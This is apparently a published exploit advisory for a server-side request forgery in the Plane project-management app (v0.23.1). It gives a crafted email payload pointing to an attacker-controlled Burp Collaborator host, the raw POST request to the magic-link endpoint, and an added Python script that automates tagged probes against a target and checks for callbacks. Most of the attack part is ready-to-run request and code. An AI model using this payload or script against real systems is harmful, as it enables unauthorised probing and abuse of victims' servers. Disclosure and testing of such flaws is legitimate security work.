# Exploit Title: Plane - Server-Side Request Forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery (magic-link login) functionality. The email field is accepted without restricting the domain part, so an attacker can submit an address whose domain they control and cause the server to send an HTTP request to that attacker-controlled host.

Steps to Reproduce:
1- Go to the password recovery or login section where the email input is required.
2- Inject the following payload in the email field, replacing the domain with a server you control (the oastify.com host below is a Burp Collaborator subdomain and must be replaced with your own):

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system. Record which protocol the collaborator logs for the interaction (HTTP, DNS, SMTP) and the source address, so the finding can be reported with the exact outbound behaviour observed; a DNS-only interaction is a weaker indicator than a full HTTP request.
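The request above can be scripted so that each probe carries a unique subdomain tag, which makes it possible to match a collaborator interaction back to the request that caused it when several targets or several probes are in flight. The script below is an added example and is not part of the original advisory or the Plane project; it assumes the target exposes POST /auth/magic-generate/ exactly as shown above, and the target URL and collaborator domain in it are placeholders to replace with your own.

```python
#!/usr/bin/env python3
"""Send the magic-link SSRF probe from the advisory to a Plane instance.

Added example, not code from the advisory or from Plane. Assumptions: the
target accepts POST /auth/magic-generate/ with a JSON body {"email": ...},
and COLLAB_DOMAIN is a DNS name you control (e.g. a Burp Collaborator or
interactsh host). Only the standard library is used.
"""
import json
import secrets
import urllib.error
import urllib.request

ENDPOINT = "/auth/magic-generate/"  # endpoint shown in the advisory


def probe_email(collab_domain: str, tag: str = "", local_part: str = "user") -> str:
    """Build an email whose domain is a unique subdomain of collab_domain.

    The per-probe tag (random if not given) lets you correlate an
    out-of-band interaction with the exact request that triggered it.
    """
    tag = tag or secrets.token_hex(4)
    return f"{local_part}@{tag}.{collab_domain}"


def build_request(base_url: str, email: str):
    """Return (url, headers, body) for the JSON POST used in the advisory.

    Compact JSON separators reproduce the 62-byte body from the write-up
    when the same email is used.
    """
    body = json.dumps({"email": email}, separators=(",", ":")).encode()
    headers = {
        "Content-Type": "application/json",
        "Content-Length": str(len(body)),
    }
    return base_url.rstrip("/") + ENDPOINT, headers, body


def send_probe(base_url: str, email: str, timeout: float = 10.0):
    """POST the probe and return (status, response body).

    A 4xx from the application is not by itself a negative result: the
    interaction logged on the collaborator is the real indicator, so the
    HTTPError is caught and its status returned instead of raised.
    """
    url, headers, body = build_request(base_url, email)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


if __name__ == "__main__":
    # Placeholder values (assumptions): replace with your target and your
    # own collaborator host before running.
    target = "http://127.0.0.1"
    collab_domain = "lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"
    email = probe_email(collab_domain)
    print("probing with", email)
    status, resp = send_probe(target, email)
    print(status, resp[:200])
    print("now check the collaborator for an interaction from the target")
```

Run it once per target and keep the printed email: the tag in front of the collaborator domain is what you search for in the collaborator log to confirm which host made the outbound request.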